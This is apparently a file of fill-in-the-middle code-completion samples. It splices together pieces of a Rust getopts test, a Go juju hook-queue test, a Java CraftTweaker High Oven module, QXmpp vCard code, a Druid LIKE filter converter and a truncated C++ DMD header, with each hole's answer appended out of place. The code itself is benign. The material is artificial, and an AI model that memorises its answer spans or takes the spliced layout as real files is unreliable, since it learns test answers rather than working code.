debug2!("expected: <<{}>>", expected);
debug2!("generated: <<{}>>", generated_usage);
assert_eq!(generated_usage, expected);
}
#[test]
fn test_groups_usage_description_wrapping() {
// indentation should be 24 spaces
// lines wrap after 78: or rather descriptions wrap after 54
let optgroups = ~[
groups::optflag("k", "kiwi",
"This is a long description which won't be wrapped..+.."), // 54
groups::optflag("a", "apple",
"This is a long description which _will_ be wrapped..+.."), // 55
];
let expected =
~"Usage: fruits
Options:
-k --kiwi This is a long description which won't be wrapped..+..
-a --apple This is a long description which _will_ be
wrapped..+..
";
let usage = groups::usage("Usage: fruits", optgroups);
debug2!("expected: <<{}>>", expected);
debug2!("generated: <<{}>>", usage);
assert!(usage == expected)
}
#[test]
fn test_groups_usage_description_multibyte_handling() {
let optgroups = ~[
groups::optflag("k", "k\u2013w\u2013",
"The word kiwi is normally spelled with two i's"),
groups::optflag("a", "apple",
"This \u201Cdescription\u201D has some characters that could \
confuse the line wrapping; an apple costs 0.51€ in some parts of Europe."),
];
let expected =
~"Usage: fruits
Options:
-k --k–w– The word kiwi is normally spelled with two i's
-a --apple This “description” has some characters that could
confuse the line wrapping; an apple costs 0.51€ in
some parts of Europe.
";
let usage = groups::usage("Usage: fruits", optgroups);
debug2!("expected: <<{}>>", expected);
debug2!("generated: <<{}>>", usage);
assert!(usage == expected)
}
}<|fim▁end|> | Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!() |
<|file_name|>hookqueue_test.go<|end_file_name|><|fim▁begin|>// Copyright 2012, 2013 Canonical Ltd.
// Licensed under the AGPLv3, see LICENCE file for details.
package relation_test
import (
stdtesting "testing"
"time"
"github.com/juju/charm/hooks"
gc "launchpad.net/gocheck"
"github.com/juju/juju/state/api/params"
coretesting "github.com/juju/juju/testing"
"github.com/juju/juju/worker/uniter/hook"
"github.com/juju/juju/worker/uniter/relation"
)
func Test(t *stdtesting.T) { coretesting.MgoTestPackage(t) }
type HookQueueSuite struct{}
var _ = gc.Suite(&HookQueueSuite{})
type msi map[string]int64
type hookQueueTest struct {
summary string
initial *relation.State
steps []checker
}
<|fim▁hole|>
func reconcileTest(summary string, members msi, joined string, steps ...checker) hookQueueTest {
return hookQueueTest{summary, &relation.State{21345, members, joined}, steps}
}
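// For example (illustrative), a table entry like
//   fullTest("...", send{msi{"u/0": 0}, nil}, expect{hooks.RelationJoined, "u/0", 0})
// feeds one RelationUnitsChange into the queue and asserts the hook it emits.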
var aliveHookQueueTests = []hookQueueTest{
fullTest(
"Empty initial change causes no hooks.",
send{nil, nil},
), fullTest(
"Joined and changed are both run when unit is first detected.",
send{msi{"u/0": 0}, nil},
expect{hooks.RelationJoined, "u/0", 0},
expect{hooks.RelationChanged, "u/0", 0},
), fullTest(
"Automatic changed is run with latest settings.",
send{msi{"u/0": 0}, nil},
expect{hooks.RelationJoined, "u/0", 0},
send{msi{"u/0": 7}, nil},
expect{hooks.RelationChanged, "u/0", 7},
), fullTest(
"Joined is also run with latest settings.",
send{msi{"u/0": 0}, nil},
send{msi{"u/0": 7}, nil},
expect{hooks.RelationJoined, "u/0", 7},
expect{hooks.RelationChanged, "u/0", 7},
), fullTest(
"Nothing happens if a unit departs before its joined is run.",
send{msi{"u/0": 0}, nil},
send{msi{"u/0": 7}, nil},
send{nil, []string{"u/0"}},
), fullTest(
"A changed is run after a joined, even if a departed is known.",
send{msi{"u/0": 0}, nil},
expect{hooks.RelationJoined, "u/0", 0},
send{nil, []string{"u/0"}},
expect{hooks.RelationChanged, "u/0", 0},
expect{hooks.RelationDeparted, "u/0", 0},
), fullTest(
"A departed replaces a changed.",
send{msi{"u/0": 0}, nil},
advance{2},
send{msi{"u/0": 7}, nil},
send{nil, []string{"u/0"}},
expect{hooks.RelationDeparted, "u/0", 7},
), fullTest(
"Changed events are ignored if the version has not changed.",
send{msi{"u/0": 0}, nil},
advance{2},
send{msi{"u/0": 0}, nil},
), fullTest(
"Redundant changed events are elided.",
send{msi{"u/0": 0}, nil},
advance{2},
send{msi{"u/0": 3}, nil},
send{msi{"u/0": 7}, nil},
send{msi{"u/0": 79}, nil},
expect{hooks.RelationChanged, "u/0", 79},
), fullTest(
"Latest hooks are run in the original unit order.",
send{msi{"u/0": 0, "u/1": 1}, nil},
advance{4},
send{msi{"u/0": 3}, nil},
send{msi{"u/1": 7}, nil},
send{nil, []string{"u/0"}},
expect{hooks.RelationDeparted, "u/0", 3},
expect{hooks.RelationChanged, "u/1", 7},
), fullTest(
"Test everything we can think of at the same time.",
send{msi{"u/0": 0, "u/1": 0, "u/2": 0, "u/3": 0, "u/4": 0}, nil},
advance{6},
// u/0, u/1, u/2 are now up to date; u/3, u/4 are untouched.
send{msi{"u/0": 1}, nil},
send{msi{"u/1": 1, "u/2": 1, "u/3": 1, "u/5": 0}, []string{"u/0", "u/4"}},
send{msi{"u/3": 2}, nil},
// - Finish off the rest of the initial state, ignoring u/4, but using
// the latest known settings.
expect{hooks.RelationJoined, "u/3", 2},
expect{hooks.RelationChanged, "u/3", 2},
// - u/0 was queued for change by the first RUC, but this change is
// no longer relevant; it's departed in the second RUC, so we run
// that hook instead.
expect{hooks.RelationDeparted, "u/0", 1},
// - Handle the remaining changes in the second RUC, still ignoring u/4.
// We do run new changed hooks for u/1 and u/2, because the latest settings
// are newer than those used in their original changed events.
expect{hooks.RelationChanged, "u/1", 1},
expect{hooks.RelationChanged, "u/2", 1},
expect{hooks.RelationJoined, "u/5", 0},
expect{hooks.RelationChanged, "u/5", 0},
// - Ignore the third RUC, because the original joined/changed on u/3
// was executed after we got the latest settings version.
), reconcileTest(
"Check that matching settings versions cause no changes.",
msi{"u/0": 0}, "",
send{msi{"u/0": 0}, nil},
), reconcileTest(
"Check that new settings versions cause appropriate changes.",
msi{"u/0": 0}, "",
send{msi{"u/0": 1}, nil},
expect{hooks.RelationChanged, "u/0", 1},
), reconcileTest(
"Check that a just-joined unit gets its changed hook run first.",
msi{"u/0": 0}, "u/0",
send{msi{"u/0": 0}, nil},
expect{hooks.RelationChanged, "u/0", 0},
), reconcileTest(
"Check that missing units are queued for depart as early as possible.",
msi{"u/0": 0}, "",
send{msi{"u/1": 0}, nil},
expect{hooks.RelationDeparted, "u/0", 0},
expect{hooks.RelationJoined, "u/1", 0},
expect{hooks.RelationChanged, "u/1", 0},
), reconcileTest(
"Double-check that a pending changed happens before an injected departed.",
msi{"u/0": 0}, "u/0",
send{nil, nil},
expect{hooks.RelationChanged, "u/0", 0},
expect{hooks.RelationDeparted, "u/0", 0},
), reconcileTest(
"Check that missing units don't slip in front of required changed hooks.",
msi{"u/0": 0}, "u/0",
send{msi{"u/1": 0}, nil},
expect{hooks.RelationChanged, "u/0", 0},
expect{hooks.RelationDeparted, "u/0", 0},
expect{hooks.RelationJoined, "u/1", 0},
expect{hooks.RelationChanged, "u/1", 0},
),
}
func (s *HookQueueSuite) TestAliveHookQueue(c *gc.C) {
for i, t := range aliveHookQueueTests {
c.Logf("test %d: %s", i, t.summary)
out := make(chan hook.Info)
in := make(chan params.RelationUnitsChange)
ruw := &RUW{in, false}
q := relation.NewAliveHookQueue(t.initial, out, ruw)
for i, step := range t.steps {
c.Logf(" step %d", i)
step.check(c, in, out)
}
expect{}.check(c, in, out)
q.Stop()
c.Assert(ruw.stopped, gc.Equals, true)
}
}
var dyingHookQueueTests = []hookQueueTest{
fullTest(
"Empty state just gets a broken hook.",
expect{hook: hooks.RelationBroken},
), reconcileTest(
"Each current member is departed before broken is sent.",
msi{"u/1": 7, "u/4": 33}, "",
expect{hooks.RelationDeparted, "u/1", 7},
expect{hooks.RelationDeparted, "u/4", 33},
expect{hook: hooks.RelationBroken},
), reconcileTest(
"If there's a pending changed, that must still be respected.",
msi{"u/0": 3}, "u/0",
expect{hooks.RelationChanged, "u/0", 3},
expect{hooks.RelationDeparted, "u/0", 3},
expect{hook: hooks.RelationBroken},
),
}
func (s *HookQueueSuite) TestDyingHookQueue(c *gc.C) {
for i, t := range dyingHookQueueTests {
c.Logf("test %d: %s", i, t.summary)
out := make(chan hook.Info)
q := relation.NewDyingHookQueue(t.initial, out)
for i, step := range t.steps {
c.Logf(" step %d", i)
step.check(c, nil, out)
}
expect{}.check(c, nil, out)
q.Stop()
}
}
// RUW exists entirely to send RelationUnitsChanged events to a tested
// HookQueue in a synchronous and predictable fashion.
type RUW struct {
in chan params.RelationUnitsChange
stopped bool
}
func (w *RUW) Changes() <-chan params.RelationUnitsChange {
return w.in
}
func (w *RUW) Stop() error {
close(w.in)
w.stopped = true
return nil
}
func (w *RUW) Err() error {
return nil
}
type checker interface {
check(c *gc.C, in chan params.RelationUnitsChange, out chan hook.Info)
}
type send struct {
changed msi
departed []string
}
func (d send) check(c *gc.C, in chan params.RelationUnitsChange, out chan hook.Info) {
ruc := params.RelationUnitsChange{Changed: map[string]params.UnitSettings{}}
for name, version := range d.changed {
ruc.Changed[name] = params.UnitSettings{Version: version}
}
for _, name := range d.departed {
ruc.Departed = append(ruc.Departed, name)
}
in <- ruc
}
type advance struct {
count int
}
func (d advance) check(c *gc.C, in chan params.RelationUnitsChange, out chan hook.Info) {
for i := 0; i < d.count; i++ {
select {
case <-out:
case <-time.After(coretesting.LongWait):
c.Fatalf("timed out waiting for event %d", i)
}
}
}
type expect struct {
hook hooks.Kind
unit string
version int64
}
func (d expect) check(c *gc.C, in chan params.RelationUnitsChange, out chan hook.Info) {
if d.hook == "" {
select {
case unexpected := <-out:
c.Fatalf("got %#v", unexpected)
case <-time.After(coretesting.ShortWait):
}
return
}
expect := hook.Info{
Kind: d.hook,
RelationId: 21345,
RemoteUnit: d.unit,
ChangeVersion: d.version,
}
select {
case actual := <-out:
c.Assert(actual, gc.DeepEquals, expect)
case <-time.After(coretesting.LongWait):
c.Fatalf("timed out waiting for %#v", expect)
}
}<|fim▁end|> | func fullTest(summary string, steps ...checker) hookQueueTest {
return hookQueueTest{summary, &relation.State{21345, nil, ""}, steps}
} |
<|file_name|>HighOven.java<|end_file_name|><|fim▁begin|>package com.blamejared.compat.tcomplement.highoven;
import java.util.LinkedHashMap;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import com.blamejared.ModTweaker;
import com.blamejared.compat.mantle.RecipeMatchIIngredient;
import com.blamejared.compat.tcomplement.highoven.recipes.HeatRecipeTweaker;
import com.blamejared.compat.tcomplement.highoven.recipes.HighOvenFuelTweaker;
import com.blamejared.compat.tcomplement.highoven.recipes.MixRecipeTweaker;
import com.blamejared.compat.tconstruct.recipes.MeltingRecipeTweaker;
import com.blamejared.mtlib.helpers.InputHelper;
import com.blamejared.mtlib.helpers.LogHelper;
import com.blamejared.mtlib.utils.BaseAction;
import crafttweaker.CraftTweakerAPI;
import crafttweaker.annotations.ModOnly;
import crafttweaker.annotations.ZenRegister;
import crafttweaker.api.item.IIngredient;
import crafttweaker.api.item.IItemStack;
import crafttweaker.api.liquid.ILiquidStack;
import crafttweaker.mc1120.item.MCItemStack;
import knightminer.tcomplement.library.TCompRegistry;
import knightminer.tcomplement.library.events.TCompRegisterEvent;
import net.minecraft.item.ItemStack;
import net.minecraft.util.NonNullList;
import net.minecraftforge.common.MinecraftForge;
import net.minecraftforge.fluids.FluidStack;
import net.minecraftforge.fml.common.eventhandler.SubscribeEvent;
import stanhebben.zenscript.annotations.Optional;
import stanhebben.zenscript.annotations.ZenClass;
import stanhebben.zenscript.annotations.ZenMethod;
import stanhebben.zenscript.util.Pair;
@ZenClass("mods.tcomplement.highoven.HighOven")
@ZenRegister
@ModOnly("tcomplement")
public class HighOven {
public static final List<IIngredient> REMOVED_FUELS = new LinkedList<>();
public static final Map<ILiquidStack, IItemStack> REMOVED_OVERRIDES = new LinkedHashMap<>();
public static final List<Pair<FluidStack, FluidStack>> REMOVED_HEAT_RECIPES = new LinkedList<>();
public static final List<Pair<FluidStack, FluidStack>> REMOVED_MIX_RECIPES = new LinkedList<>();
private static boolean init = false;
private static void init() {
if (!init) {
MinecraftForge.EVENT_BUS.register(new HighOven());
init = true;
}
}
/*-------------------------------------------------------------------------*\
| High Oven Fuels |
\*-------------------------------------------------------------------------*/
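// Example ZenScript usage (illustrative; bracket items are assumptions):
//   mods.tcomplement.highoven.HighOven.addFuel(<minecraft:coal_block>, 1200, 8);
//   mods.tcomplement.highoven.HighOven.removeFuel(<minecraft:lava_bucket>);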
@ZenMethod
public static void removeFuel(IIngredient stack) {
init();
CraftTweakerAPI.apply(new HighOven.RemoveFuel(stack));
}
@ZenMethod
public static void addFuel(IIngredient fuel, int burnTime, int tempRate) {
init();
ModTweaker.LATE_ADDITIONS.add(new HighOven.AddFuel(fuel, burnTime, tempRate));
}
private static class AddFuel extends BaseAction {
private IIngredient fuel;
private int time;
private int rate;
public AddFuel(IIngredient fuel, int time, int rate) {
super("High Oven fuel");
this.fuel = fuel;
this.time = time;
this.rate = rate;
}
@Override
public void apply() {
TCompRegistry.registerFuel(new HighOvenFuelTweaker(new RecipeMatchIIngredient(fuel), time, rate));
}
@Override
public String describe() {
return String.format("Adding %s as %s", this.getRecipeInfo(), this.name);
}
@Override
public String getRecipeInfo() {
return LogHelper.getStackDescription(fuel);
}
}
private static class RemoveFuel extends BaseAction {
private IIngredient fuel;
public RemoveFuel(IIngredient fuel) {
super("High Oven fuel");
this.fuel = fuel;
}
@Override
public void apply() {
REMOVED_FUELS.add(fuel);
}
@Override
public String describe() {
return String.format("Removing %s as %s", this.getRecipeInfo(), this.name);
}
@Override
public String getRecipeInfo() {
return LogHelper.getStackDescription(fuel);
}
}
/*-------------------------------------------------------------------------*\
| High Oven Melting |
\*-------------------------------------------------------------------------*/
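// Example ZenScript usage (illustrative; bracket items are assumptions):
//   mods.tcomplement.highoven.HighOven.addMeltingOverride(<liquid:iron> * 144, <minecraft:iron_ore>, 800);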
@ZenMethod
public static void addMeltingOverride(ILiquidStack output, IIngredient input, @Optional int temp) {
init();
ModTweaker.LATE_ADDITIONS
.add(new HighOven.AddMelting(InputHelper.toFluid(output), input, (temp == 0 ? -1 : temp)));
}
@ZenMethod
public static void removeMeltingOverride(ILiquidStack output, @Optional IItemStack input) {
init();
CraftTweakerAPI.apply(new HighOven.RemoveMelting(output, input));
}
private static class AddMelting extends BaseAction {
private IIngredient input;
private FluidStack output;
private int temp;
public AddMelting(FluidStack output, IIngredient input, int temp) {
super("High Oven melting override");
this.input = input;
this.output = output;
this.temp = temp;
}
@Override
public void apply() {
if (temp > 0) {
TCompRegistry.registerHighOvenOverride(
new MeltingRecipeTweaker(new RecipeMatchIIngredient(input, output.amount), output, temp));
} else {
TCompRegistry.registerHighOvenOverride(
new MeltingRecipeTweaker(new RecipeMatchIIngredient(input, output.amount), output));
}
}
@Override
public String describe() {
return String.format("Adding %s for %s", this.name, this.getRecipeInfo());
}
@Override
protected String getRecipeInfo() {
return LogHelper.getStackDescription(input) + ", now yields " + LogHelper.getStackDescription(output);
}
}
private static class RemoveMelting extends BaseAction {
private ILiquidStack output;
private IItemStack input;
public RemoveMelting(ILiquidStack output, IItemStack input) {
super("High Oven melting override");
this.input = input;
this.output = output;
}
@Override
public void apply() {
REMOVED_OVERRIDES.put(output, input);
}
@Override
public String describe() {
return String.format("Removing %s Recipe(s) for %s", this.name, this.getRecipeInfo());
}
@Override
protected String getRecipeInfo() {
return LogHelper.getStackDescription(output);
}
}
/*-------------------------------------------------------------------------*\
| High Oven Heat |
\*-------------------------------------------------------------------------*/
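// Example ZenScript usage (illustrative; liquids are assumptions):
//   mods.tcomplement.highoven.HighOven.addHeatRecipe(<liquid:steam>, <liquid:water>, 700);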
@ZenMethod
public static void removeHeatRecipe(ILiquidStack output, @Optional ILiquidStack input) {
init();
CraftTweakerAPI.apply(new RemoveHeat(input, output));
}
@ZenMethod
public static void addHeatRecipe(ILiquidStack output, ILiquidStack input, int temp) {
init();
ModTweaker.LATE_ADDITIONS
.add(new HighOven.AddHeat(InputHelper.toFluid(output), InputHelper.toFluid(input), temp));
}
private static class AddHeat extends BaseAction {
private FluidStack output, input;
private int temp;
public AddHeat(FluidStack output, FluidStack input, int temp) {
super("High Oven Heat");
this.output = output;
this.input = input;
this.temp = temp;
}
@Override
public void apply() {
TCompRegistry.registerHeatRecipe(new HeatRecipeTweaker(input, output, temp));
}
@Override
public String describe() {
return String.format("Adding %s Recipe for %s", this.name, this.getRecipeInfo());
}
@Override
protected String getRecipeInfo() {
return LogHelper.getStackDescription(output);
}
}
private static class RemoveHeat extends BaseAction {
private ILiquidStack input;
private ILiquidStack output;
public RemoveHeat(ILiquidStack input, ILiquidStack output) {
super("High Oven Heat");
this.input = input;
this.output = output;
}
@Override
public void apply() {
REMOVED_HEAT_RECIPES.add(new Pair<>(InputHelper.toFluid(input), InputHelper.toFluid(output)));
}
@Override
public String describe() {
return String.format("Removing %s Recipe(s) for %s", this.name, this.getRecipeInfo());
}
@Override
public String getRecipeInfo() {
return LogHelper.getStackDescription(output)
+ ((input == null) ? "" : (" from " + LogHelper.getStackDescription(input)));
}
}
/*-------------------------------------------------------------------------*\
| High Oven Mix |
\*-------------------------------------------------------------------------*/
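// Example ZenScript usage (illustrative; liquids are assumptions):
//   mods.tcomplement.highoven.HighOven.removeMixRecipe(<liquid:steel>, <liquid:iron>);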
@ZenMethod
public static void removeMixRecipe(ILiquidStack output, @Optional ILiquidStack input) {
init();
CraftTweakerAPI.apply(new RemoveMix(output, input));
}
@ZenMethod
public static MixRecipeBuilder newMixRecipe(ILiquidStack output, ILiquidStack input, int temp) {
init();
return new MixRecipeBuilder(output, input, temp);
}
@ZenMethod
public static MixRecipeManager manageMixRecipe(ILiquidStack output, ILiquidStack input) {
init();
return new MixRecipeManager(output, input);
}
private static class RemoveMix extends BaseAction {
private ILiquidStack output;
private ILiquidStack input;
public RemoveMix(ILiquidStack output, ILiquidStack input) {
super("High Oven Mix");
this.output = output;
this.input = input;
}
@Override
public void apply() {
REMOVED_MIX_RECIPES.add(new Pair<>(InputHelper.toFluid(input), InputHelper.toFluid(output)));
}
@Override
public String describe() {
return String.format("Removing %s Recipe(s) for %s", this.name, this.getRecipeInfo());
}
@Override
protected String getRecipeInfo() {
return LogHelper.getStackDescription(output)
+ ((input == null) ? "" : (" from " + LogHelper.getStackDescription(input)));
}
}
/*-------------------------------------------------------------------------*\
| Event handlers |
\*-------------------------------------------------------------------------*/
@SubscribeEvent
public void onHighOvenFuelRegister(TCompRegisterEvent.HighOvenFuelRegisterEvent event) {
if (event.getRecipe() instanceof HighOvenFuelTweaker) {
return;
}
for (IIngredient entry : REMOVED_FUELS) {
for (ItemStack fuel : event.getRecipe().getFuels()) {
if (entry.matches(new MCItemStack(fuel))) {
event.setCanceled(true);
return;
}
}
}
}
@SubscribeEvent
public void onHighOvenHeatRegister(TCompRegisterEvent.HighOvenHeatRegisterEvent event) {
if (event.getRecipe() instanceof HeatRecipeTweaker) {
return;
} else {
for (Pair<FluidStack, FluidStack> entry : REMOVED_HEAT_RECIPES) {
if (event.getRecipe().matches(entry.getKey(), entry.getValue())) {
event.setCanceled(true);
return;
}
}
}
}
@SubscribeEvent
public void onHighOvenMixRegister(TCompRegisterEvent.HighOvenMixRegisterEvent event) {
if (event.getRecipe() instanceof MixRecipeTweaker) {
return;
} else {
for (Pair<FluidStack, FluidStack> entry : REMOVED_MIX_RECIPES) {
if (event.getRecipe().matches(entry.getKey(), entry.getValue())) {
event.setCanceled(true);
return;
}
}<|fim▁hole|> public void onHighOvenOverrideRegister(TCompRegisterEvent.HighOvenOverrideRegisterEvent event) {
if (event.getRecipe() instanceof MeltingRecipeTweaker) {
return;
}
for (Map.Entry<ILiquidStack, IItemStack> entry : REMOVED_OVERRIDES.entrySet()) {
if (event.getRecipe().getResult().isFluidEqual(((FluidStack) entry.getKey().getInternal()))) {
if (entry.getValue() != null) {
if (event.getRecipe().input
.matches(NonNullList.withSize(1, (ItemStack) entry.getValue().getInternal())).isPresent()) {
event.setCanceled(true);
}
} else
event.setCanceled(true);
}
}
}
}<|fim▁end|> | }
}
@SubscribeEvent |
<|file_name|>QXmppVCardManager.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright (C) 2008-2014 The QXmpp developers
*
* Author:
* Manjeet Dahiya
*
* Source:
* https://github.com/qxmpp-project/qxmpp
*
* This file is a part of QXmpp library.
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
*/
#include "QXmppClient.h"
#include "QXmppConstants.h"
#include "QXmppUtils.h"
#include "QXmppVCardIq.h"
#include "QXmppVCardManager.h"
class QXmppVCardManagerPrivate
{
public:
QXmppVCardIq clientVCard;
bool isClientVCardReceived;
};
QXmppVCardManager::QXmppVCardManager()
: d(new QXmppVCardManagerPrivate)
{
d->isClientVCardReceived = false;
}
QXmppVCardManager::~QXmppVCardManager()
{
delete d;
}
/// Requests the vCard of the specified JID from the server.
/// Once received, the vCardReceived() signal is emitted.
///
/// \param jid Jid of the specific entry in the roster
///
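/// Example (illustrative sketch):
/// \code
/// QXmppVCardManager *mgr = client->findExtension<QXmppVCardManager>();
/// if (mgr)
///     mgr->requestVCard("juliet@capulet.example");
/// \endcode
///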
QString QXmppVCardManager::requestVCard(const QString& jid)
{
QXmppVCardIq request(jid);
if(client()->sendPacket(request))
return request.id();
else
return QString();
}
/// Returns the vCard of the connected client.
///
/// \return QXmppVCard
///
const QXmppVCardIq& QXmppVCardManager::clientVCard() const
{
return d->clientVCard;
}
/// Sets the vCard of the connected client.
///
/// \param clientVCard QXmppVCard
///
void QXmppVCardManager::setClientVCard(const QXmppVCardIq& clientVCard)
{
d->clientVCard = clientVCard;
d->clientVCard.setTo("");
d->clientVCard.setFrom("");
d->clientVCard.setType(QXmppIq::Set);
client()->sendPacket(d->clientVCard);
}
/// This function requests the vCard of the connected user itself from the
/// server. Once received, the clientVCardReceived() signal is emitted, and
/// the vCard can be retrieved with clientVCard().
QString QXmppVCardManager::requestClientVCard()
{
return requestVCard();
}
/// Returns true if vCard of the connected client has been
/// received else false.
///
/// \return bool
///
bool QXmppVCardManager::isClientVCardReceived() const
{
return d->isClientVCardReceived;
}
/// \cond
QStringList QXmppVCardManager::discoveryFeatures() const
{
// XEP-0054: vcard-temp<|fim▁hole|>bool QXmppVCardManager::handleStanza(const QDomElement &element)
{
if(element.tagName() == "iq" && QXmppVCardIq::isVCard(element))
{
QXmppVCardIq vCardIq;
vCardIq.parse(element);
if (vCardIq.from().isEmpty()) {
d->clientVCard = vCardIq;
d->isClientVCardReceived = true;
emit clientVCardReceived();
}
emit vCardReceived(vCardIq);
return true;
}
return false;
}
/// \endcond<|fim▁end|> | return QStringList() << ns_vcard;
}
|
<|file_name|>LikeOperatorConversion.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.sql.calcite.expression.builtin;
import org.apache.calcite.rex.RexCall;
import org.apache.calcite.rex.RexLiteral;<|fim▁hole|>import org.apache.calcite.sql.fun.SqlStdOperatorTable;
import org.apache.druid.query.filter.DimFilter;
import org.apache.druid.query.filter.LikeDimFilter;
import org.apache.druid.segment.VirtualColumn;
import org.apache.druid.segment.column.RowSignature;
import org.apache.druid.sql.calcite.expression.DirectOperatorConversion;
import org.apache.druid.sql.calcite.expression.DruidExpression;
import org.apache.druid.sql.calcite.expression.Expressions;
import org.apache.druid.sql.calcite.planner.PlannerContext;
import org.apache.druid.sql.calcite.rel.VirtualColumnRegistry;
import javax.annotation.Nullable;
import java.util.List;
public class LikeOperatorConversion extends DirectOperatorConversion
{
private static final SqlOperator SQL_FUNCTION = SqlStdOperatorTable.LIKE;
public LikeOperatorConversion()
{
super(SQL_FUNCTION, "like");
}
@Override
public SqlOperator calciteOperator()
{
return SQL_FUNCTION;
}
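// For example (illustrative): the SQL predicate `dim LIKE 'druid%'` converts to
// new LikeDimFilter("dim", "druid%", null, null) when `dim` is a plain column
// (the simple-extraction branch below).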
@Nullable
@Override
public DimFilter toDruidFilter(
PlannerContext plannerContext,
RowSignature rowSignature,
@Nullable VirtualColumnRegistry virtualColumnRegistry,
RexNode rexNode
)
{
final List<RexNode> operands = ((RexCall) rexNode).getOperands();
final DruidExpression druidExpression = Expressions.toDruidExpression(
plannerContext,
rowSignature,
operands.get(0)
);
if (druidExpression == null) {
return null;
}
if (druidExpression.isSimpleExtraction()) {
return new LikeDimFilter(
druidExpression.getSimpleExtraction().getColumn(),
RexLiteral.stringValue(operands.get(1)),
operands.size() > 2 ? RexLiteral.stringValue(operands.get(2)) : null,
druidExpression.getSimpleExtraction().getExtractionFn()
);
} else if (virtualColumnRegistry != null) {
VirtualColumn v = virtualColumnRegistry.getOrCreateVirtualColumnForExpression(
plannerContext,
druidExpression,
operands.get(0).getType().getSqlTypeName()
);
return new LikeDimFilter(
v.getOutputName(),
RexLiteral.stringValue(operands.get(1)),
operands.size() > 2 ? RexLiteral.stringValue(operands.get(2)) : null,
null
);
} else {
return null;
}
}
}<|fim▁end|> | import org.apache.calcite.rex.RexNode;
import org.apache.calcite.sql.SqlOperator; |
<|file_name|>dmd.hpp<|end_file_name|><|fim▁begin|>/*
Copyright (c) 2014, Sam Schetterer, Nathan Kutz, University of Washington
Authors: Sam Schetterer
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef DMD_HPP
#define DMD_HPP
#include "defs.hpp"
#include <eigen3/Eigen/Core>
#include <eigen3/Eigen/Dense>
#include <eigen3/Eigen/SVD>
template<class T, class mat>
struct eigenval_type{
typedef Eigen::EigenSolver<mat> solver;
};
template<class T, class mat>
struct eigenval_type<std::complex<T>, mat>{
typedef Eigen::ComplexEigenSolver<mat> solver;
};
template<class T, int storage>
using dmat = Eigen::Matrix<T, Eigen::Dynamic, Eigen::Dynamic, storage>;
template<class T>
using dvec = Eigen::Matrix<T, Eigen::Dynamic, 1>;
// invals is the n x (m+1) snapshot matrix: column k+1 holds the state one time step after column k
template<class T, int storage, int storage_out1, int storage_out2>
inline void _dmd_(const dmat<T, storage>& invals,
dmat<T, storage_out1>& evecs, dvec<T>& evals, dmat<T, storage_out2>* pod_ptr,
double energy){
// From Tu et al., "On Dynamic Mode Decomposition: Theory and Applications",
// the thin SVD suffices (the rank of the input fixes the SVD dimensions).
Eigen::JacobiSVD<dmat<T, storage>>
svd(invals.rightCols(invals.cols()-1),Eigen::ComputeThinU | Eigen::ComputeThinV);
// truncate the SVD once the requested fraction of the energy is captured
const auto& sing_vals = svd.singularValues();
double ener = energy * sing_vals.squaredNorm(); // target: requested fraction of total energy
decltype(svd.nonzeroSingularValues()) num_keep=0;
double ener_cum_sum=0;
while(ener_cum_sum < ener){
ener_cum_sum += sing_vals[num_keep]*sing_vals[num_keep];
num_keep++;
if(num_keep >= svd.nonzeroSingularValues()){
break;
}
}
dmat<T, storage> S(num_keep, num_keep);
//calculate the dmd
S.noalias() = svd.matrixU().leftCols(num_keep).adjoint()*
invals.leftCols(invals.cols()-1)*svd.matrixV().leftCols(num_keep) *
(1.0/svd.singularValues().head(num_keep).array()).matrix().asDiagonal();
//calculate eigenvalues/eigenvectors
typename eigenval_type<T, dmat<T, storage>>::solver esolver(S);
if(esolver.info() != Eigen::Success){
err("Eigenvalues failed to compute", "dmd",
"utils/dmd.hpp", FATAL_ERROR);
}
//calculate the modes from POD and eigenvectors
evecs.noalias() = svd.matrixU().leftCols(num_keep)*esolver.eigenvectors();
evals = esolver.eigenvalues();
if(pod_ptr){
*(pod_ptr) = svd.matrixU().leftCols(num_keep);
}
}
template<class T, int storage, int storage_out1>
inline void dmd(const dmat<T, storage>& invals,
dmat<T, storage_out1>& evecs, dvec<T>& evals, double energy){
//no POD output requested; explicit template arguments let nullptr bind
